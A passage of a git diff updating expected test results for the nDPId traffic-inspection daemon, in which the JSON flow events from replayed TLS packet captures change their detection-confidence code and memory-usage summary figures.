it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","packets-captured":182,"packets-processed":182,"total-skipped-flows":0,"total-l4-payload-len":105569,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1553619149372} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 182/182 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5915559 bytes -~~ total memory freed........: 5915559 bytes -~~ total allocations/frees...: 118358/118358 +~~ total memory allocated....: 6049193 bytes +~~ total memory freed........: 6049193 bytes +~~ total allocations/frees...: 121120/121120 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2434 chars diff --git a/test/results/tls_port_80.pcapng.out b/test/results/tls_port_80.pcapng.out index 7a7b37c5d..379204a09 100644 --- a/test/results/tls_port_80.pcapng.out +++ b/test/results/tls_port_80.pcapng.out @@ -4,8 +4,8 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744619257,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619257,"pkt":"AAAAAAAAAAQAaFgECABFAAA062pAAH8G+tE5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744619383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619383,"pkt":"AAAAAAAAAAMAlyocCABFAAA0AABAADUGMD2EMY04OVvKwgBQxW2J+2kQhDAHy4AS+vAZxAAAAgQFtAEBBAIBAwMH"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744620269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744620269,"pkt":"AAAAAAAAAAQAaFgECABFAAA062tAAH8G+tA5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01227{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01227{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":1605,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1618744633908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871981 bytes -~~ total memory freed........: 5871981 bytes -~~ total allocations/frees...: 118133/118133 +~~ total memory allocated....: 6005615 bytes +~~ total memory freed........: 6005615 bytes +~~ total allocations/frees...: 120895/120895 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1232 chars diff --git a/test/results/tls_torrent.pcapng.out b/test/results/tls_torrent.pcapng.out index 1cf445c7b..7df769596 100644 --- a/test/results/tls_torrent.pcapng.out +++ b/test/results/tls_torrent.pcapng.out @@ -4,10 +4,10 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054407415,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407415,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug0AAOIGSgIKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639054407427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407427,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug8AAOIGSgAKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639054407443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1639054407443,"pkt":"AAAAAAAAAAgAP8PgCABFAAF07ppAAH8GNzXAqAABCgoKAeXaAbsR7uhvhBxN9VAYAQFi5gAAFgMBAUcBAAFDAwMaHZWwfkF0Un0n60H4DuzdTswHjey14FNv5IuITjtzKgAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAABuAAAAFQATAAAQd2ViLnV0b3JyZW50LmNvbQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":5906,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054407576} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5884180 bytes -~~ total memory freed........: 5884180 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6017814 bytes +~~ total memory freed........: 6017814 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1343 chars diff --git a/test/results/tls_verylong_certificate.pcap.out b/test/results/tls_verylong_certificate.pcap.out index 99ad7a0f8..d569b69da 100644 --- a/test/results/tls_verylong_certificate.pcap.out +++ b/test/results/tls_verylong_certificate.pcap.out @@ -4,10 +4,10 @@ 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578254908457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578254908457,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGntnAqAGgl2VCMdYUAbur4+BEAAAAALAC\/\/9+XwAAAgQFtAEDAwUBAQgKAb+3BwAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578254908469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578254908469,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGqN2XZUIxwKgBoAG71hTYdp3Gq+PgRaASauCAYQAAAgQFZAQCCApynbuCAb+3BwEDAwk="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1578254908469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578254908469,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnuXAqAGgl2VCMdYUAbur4+BF2Hadx4AQEAgJrQAAAQEICgG\/txJynbuC"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 